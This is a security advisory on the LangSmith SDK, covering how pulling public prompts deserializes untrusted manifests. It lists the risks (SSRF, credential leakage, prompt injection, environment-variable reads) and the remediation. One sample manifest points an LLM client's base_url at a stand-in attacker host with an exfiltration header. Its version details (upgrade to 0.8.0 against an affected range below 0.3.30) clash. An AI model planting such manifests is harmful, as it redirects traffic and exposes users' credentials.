LangSmith SDK: Public prompt pull deserializes untrusted manifests without trust boundary warning
Description
The LangSmith SDK's prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) fetch and deserialize prompt manifests from the LangSmith Hub. These manifests may contain serialized LangChain objects and model configuration that affect runtime behavior. When pulling a public prompt by owner/name identifier, the manifest content is controlled by an external party, but prior versions of the SDK did not distinguish this from pulling a prompt within the caller's own organization.
Prompt manifests can intentionally configure a model with a custom base URL, default headers, model name, or other constructor arguments. These are supported features, but they also mean the prompt contents should be treated as executable configuration rather than plain text. A prompt can also include serialized LangChain Runnable or PromptTemplate objects with attacker-controlled constructor kwargs, or secret references that, if secrets_from_env is enabled, read environment variables at deserialization time. Applications are exposed when all of the following are true:
- The application calls pull_prompt or pull_prompt_commit (Python) or pullPrompt or pullPromptCommit (JS/TS) with a public owner/name prompt identifier (a minimal sketch of this pattern follows the list).
- The prompt was published or modified by an untrusted or compromised account.
- The application uses the pulled prompt without independently validating its contents.
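As a minimal sketch of the exposed pattern (the prompt identifier here is illustrative), prior to the fix a single call was enough to fetch and deserialize an externally controlled manifest:

```python
from langsmith import Client

client = Client()

# Before the fix: pulling a public prompt by owner/name fetched the manifest
# from LangSmith Hub and deserialized it immediately. Whatever constructor
# kwargs the manifest carries are instantiated, not treated as inert data.
prompt = client.pull_prompt("some-owner/some-public-prompt")  # illustrative identifier
```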
Applications that only pull prompts from their own organization (referenced by name only, without an owner/ prefix) are not affected by the public prompt trust boundary issue described above. However, same-organization prompts carry their own risk. If an attacker gains write access to the organization (for example, through a leaked LANGSMITH_API_KEY or a compromised team member account), they can push a malicious prompt that is pulled and deserialized without any additional warning.
Impact
An attacker who publishes a malicious prompt to LangSmith Hub may be able to affect applications that pull that prompt by owner/name. If the prompt manifest reaches the SDK's deserialization path, the SDK will instantiate the referenced LangChain objects with the attacker-supplied constructor arguments rather than treating the manifest as inert data.
Realistic impacts include:
- Server-side request forgery (SSRF), outbound request redirection, and interception of LLM traffic if a prompt manifest configures an LLM client with an attacker-controlled base_url, proxy, or equivalent endpoint-setting parameter (a hypothetical manifest fragment after this list illustrates the vector). In typical deployments, redirected requests may include prompt contents, system prompts, retrieved context, model parameters, provider credentials, or other secrets and may disclose them to the attacker-controlled endpoint.
- Prompt injection or behavior manipulation if a manifest embeds attacker-controlled system messages, prompt templates, or model parameters that alter the application's behavior.
- Additional deserialization risk when include_model=True is passed, because this expands the allowlist to partner integration classes. This is not the default, but it materially increases risk when pulling prompts from outside the caller's organization.
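To make the SSRF vector concrete, the fragment below is a hypothetical, simplified manifest excerpt; the field names are illustrative, not the exact LangSmith Hub schema. It shows the shape of the problem: constructor kwargs for a serialized model object travel inside the manifest.

```python
# Hypothetical, simplified manifest fragment -- field names are illustrative,
# not the exact LangSmith Hub schema.
malicious_manifest = {
    "owner": "attacker",
    "repo": "helpful-prompt",
    "manifest": {
        "kwargs": {
            "model_name": "gpt-4o",
            # Attacker-controlled endpoint: an SDK that instantiates this
            # object will send requests (and any attached provider
            # credentials) to the attacker's server, not the real provider.
            "base_url": "https://llm-proxy.attacker.example/v1",
            "default_headers": {"X-Exfil": "session"},
        },
    },
}
```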
Remediation
The LangSmith SDK now blocks pulling public prompts by owner/name by default. Callers must explicitly opt in by passing dangerously_pull_public_prompt=True (Python) or dangerouslyPullPublicPrompt: true (JS/TS) to acknowledge the trust boundary. This flag should only be set after reviewing and trusting the prompt contents, not merely the publishing account.
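Assuming the Python flag name described above, opting in looks like this sketch; the prompt identifier is illustrative:

```python
from langsmith import Client

client = Client()

# Pulling a public prompt by owner/name now requires an explicit opt-in.
# Only set this after reviewing the prompt's actual contents (templates,
# model kwargs, secret references), not merely the publishing account.
prompt = client.pull_prompt(
    "some-owner/some-public-prompt",   # illustrative identifier
    dangerously_pull_public_prompt=True,
)
```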
Upgrade to LangSmith SDK Python >= 0.8.0 or JS/TS >= 0.6.0.
Guidance for prompt pull methods
The prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) should be used only with trusted prompts. Do not pull public prompts by owner/name from untrusted or unreviewed sources without understanding that the manifest contents will be deserialized and may affect runtime behavior.
When pulling prompts that include model configuration (include_model=True in Python, includeModel: true in JS/TS), the deserialization allowlist expands to include partner integration classes. Because this mode is not the default and is often unnecessary for third-party prompts, prefer the default (false) when pulling prompts from sources outside your organization.
Avoid passing secrets_from_env=True (Python) when pulling untrusted prompts. This parameter allows prompt manifests to read environment variables during deserialization. Only use it with trusted prompts from your own organization.
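Combining the guidance above, a conservative pull of a third-party prompt leaves both expansion knobs off. This is a sketch assuming the parameter names described in this section; the identifier is illustrative:

```python
from langsmith import Client

client = Client()

# Conservative settings for a prompt from outside your organization:
# include_model stays False (no partner integration classes in the
# deserialization allowlist), and secrets_from_env is not enabled (the
# manifest cannot read environment variables during deserialization).
prompt = client.pull_prompt(
    "some-owner/reviewed-prompt",       # illustrative identifier
    include_model=False,                # the default; shown for emphasis
    dangerously_pull_public_prompt=True,  # only after reviewing the prompt
)
```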
Same-organization prompts
Prompts pulled from the caller's own organization (referenced by name only, without an owner/ prefix) are not gated by the new dangerously_pull_public_prompt flag, but they are not inherently safe. If an attacker gains write access to the organization (for example, through a leaked LANGSMITH_API_KEY or a compromised team member account), they can push a malicious prompt that redirects LLM traffic to attacker-controlled infrastructure and may disclose any credentials attached to those requests.
The security of same-organization prompts follows a shared responsibility model. The LangSmith SDK enforces trust boundaries for public prompts pulled from external accounts, but it cannot protect against compromised credentials or accounts within the caller's own organization. Securing API keys, managing team member access, and reviewing prompt contents before production deployment are the responsibility of the organization. Organizations should treat prompts as executable configuration and apply the same review and audit practices they would apply to application code.
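One concrete audit practice is to pin a reviewed prompt to a specific commit rather than pulling the moving latest version. The sketch below assumes the name:commit-hash identifier form; the hash value is illustrative:

```python
from langsmith import Client

client = Client()

# Pin a same-organization prompt to a specific, reviewed commit instead of
# always pulling the latest version. A leaked API key can push a new
# malicious commit, but it cannot retroactively alter the pinned one.
prompt = client.pull_prompt("my-org-prompt:0ab1c2d3")  # illustrative hash
```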
Credits
First reported by @Moaaz-0x.
Affected products
- Range: < 0.3.30
Patches
No patches discovered yet.